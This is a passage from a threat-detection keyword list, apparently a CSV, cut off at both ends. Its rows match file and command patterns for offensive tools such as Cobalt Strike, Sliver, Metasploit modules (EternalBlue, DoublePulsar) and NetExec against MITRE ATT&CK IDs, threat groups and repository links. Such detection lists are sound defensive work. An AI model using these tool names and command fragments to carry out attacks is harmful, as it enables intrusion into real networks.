It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*sleepmask.x64.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*sleepmask.x86.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*sleepmask_pivot.x64.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*sleepmask_pivot.x86.o*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*slemire/WSPCoerce*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z
-*SlinkyCat.ps1*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z
-*SlinkyCat-main*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z
-*Sliver C2 Session*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver.service*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver.sh/install*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver/.sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver:sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team 
framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver_pcap_parser.py*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-client_linux*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-client_macos*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-client_windows.exe*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - 
TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-dns*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*SliverKeylogger*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z
-*sliverpb*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-server daemon*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*sliver-server.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*SlowLoris*,offensive_tool_keyword,SlowLoris,Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this,T1498 - T1496 - T1490,TA0002 - TA0004 - TA0007,N/A,N/A,DDOS,https://github.com/gkbrk/slowloris,1,1,N/A,N/A,10,2169,671,2023-05-05T19:21:29Z,2015-04-26T10:00:33Z
-*slowloris.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SluiEOP.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*smartbrute *kerberos*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SmashedPotato.cs*,offensive_tool_keyword,SmashedPotato,A modification of @breenmachine original Hot Potato Priv Esc Exploit,T1059 - T1134 - T1201 - T1518,TA0002 - TA0004 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/SmashedPotato,1,1,N/A,N/A,1,81,35,2016-01-29T14:31:18Z,2016-01-20T20:49:08Z -*SmashedPotato.exe*,offensive_tool_keyword,SmashedPotato,A modification of @breenmachine original Hot Potato Priv Esc Exploit,T1059 - T1134 - T1201 - T1518,TA0002 - TA0004 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/SmashedPotato,1,1,N/A,N/A,1,81,35,2016-01-29T14:31:18Z,2016-01-20T20:49:08Z -*smb * -u * -p * * -M bh_owned*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 
- TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*smb * -u * -p * -M ioxidresolver*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*smb.dcsync*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*smb/impacket*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb/relay/ntlm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_doublepulsar_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_doublepulsar_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumshares*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumshares.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_enumusers_domain.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_eternalblue*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smb_ms17_010_pass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*smb_pipename_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 